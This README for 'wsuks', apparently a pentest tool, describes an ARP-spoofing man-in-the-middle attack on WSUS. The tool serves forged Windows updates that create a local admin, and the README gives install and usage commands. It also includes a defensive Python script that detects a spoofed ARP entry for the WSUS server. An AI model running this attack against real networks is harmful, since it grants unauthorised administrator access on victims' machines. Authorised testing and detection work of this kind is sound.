A Tool for automating the MITM attack on the WSUS connection
wsuks
Weaponizing the WSUS Attack
Becoming local admin on a domain-joined Windows machine is usually the first step toward obtaining domain admin privileges in a pentest. To carry out the WSUS attack automatically, this tool spoofs the IP address of the WSUS server inside the network via ARP and serves its own Windows updates as soon as the client requests them. By default, a Windows client requests updates every 24 hours. On request, wsuks provides its own "updates", which execute PowerShell commands on the target to create a local admin and add it to the local Administrators group.
The served executable (default: PsExec64.exe) and the executed command can both be changed as needed.
Installation
Using pipx:
```bash
sudo apt install python3-pipx git
sudo pipx ensurepath
sudo pipx install wsuks
```
Using poetry:
```bash
sudo apt install python3-poetry
git clone https://github.com/NeffIsBack/wsuks
cd wsuks
sudo poetry install
```
Usage
❗wsuks must be run as root❗
With pipx:
```bash
sudo -i
wsuks
wsuks -t 10.0.0.10 --WSUS-Server 10.0.0.20
```
With poetry:
```bash
sudo poetry run wsuks
sudo poetry run wsuks -t 10.0.0.10 --WSUS-Server 10.0.0.20
```
About & Mitigation
In the PyWSUS repository from GoSecure you can find great documentation on how to detect and mitigate this attack. They also wrote a great guide demonstrating how this attack works in detail here.
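The attack depends on the client accepting a forged ARP entry for the WSUS server, so one client-side check is to compare that entry against a known-good MAC address. The following is an added example, not code from wsuks or PyWSUS; it parses `arp -a` or `ip neigh` output, and the MAC addresses, the 10.0.0.66 host and the function names are constructed for illustration.

```python
import re

# Matches one neighbour entry in Windows `arp -a` or Linux `ip neigh` output.
ENTRY_RE = re.compile(
    r"^\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+.*?"
    r"(?P<mac>(?:[0-9a-f]{2}[:-]){5}[0-9a-f]{2})\b",
    re.IGNORECASE,
)

def normalize_mac(mac):
    """Lower-case and use ':' so 00-15-5D-.. and 00:15:5d:.. compare equal."""
    return mac.lower().replace("-", ":")

def parse_neighbors(text):
    """Return {ip: mac} for every entry found in the ARP/neighbour table dump."""
    table = {}
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            table[m.group("ip")] = normalize_mac(m.group("mac"))
    return table

def check_wsus_arp(text, wsus_ip, baseline_mac):
    """Return findings about the WSUS server's ARP entry (empty list = clean)."""
    table = parse_neighbors(text)
    findings = []
    seen = table.get(wsus_ip)
    if seen is None:
        return findings  # no cached entry, nothing to compare
    want = normalize_mac(baseline_mac)
    if seen != want:
        findings.append(f"{wsus_ip} resolves to {seen}, baseline is {want}")
    twins = sorted(ip for ip, mac in table.items() if mac == seen and ip != wsus_ip)
    if twins:
        findings.append(f"{wsus_ip} shares MAC {seen} with {', '.join(twins)}")
    return findings

# Constructed sample: `arp -a` on client 10.0.0.10 while the WSUS IP is spoofed.
SPOOFED = """\
Interface: 10.0.0.10 --- 0x5
  Internet Address      Physical Address      Type
  10.0.0.1              00-15-5d-00-00-01     dynamic
  10.0.0.20             00-15-5d-00-00-66     dynamic
  10.0.0.66             00-15-5d-00-00-66     dynamic
"""

if __name__ == "__main__":
    for finding in check_wsus_arp(SPOOFED, "10.0.0.20", "00-15-5D-00-00-20"):
        print("ALERT:", finding)
```

The baseline MAC has to be recorded while the network is in a trusted state. The check only applies when client and WSUS server share a layer-2 segment, since otherwise the client caches the gateway's MAC rather than the server's.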
This Tool is based on the following projects: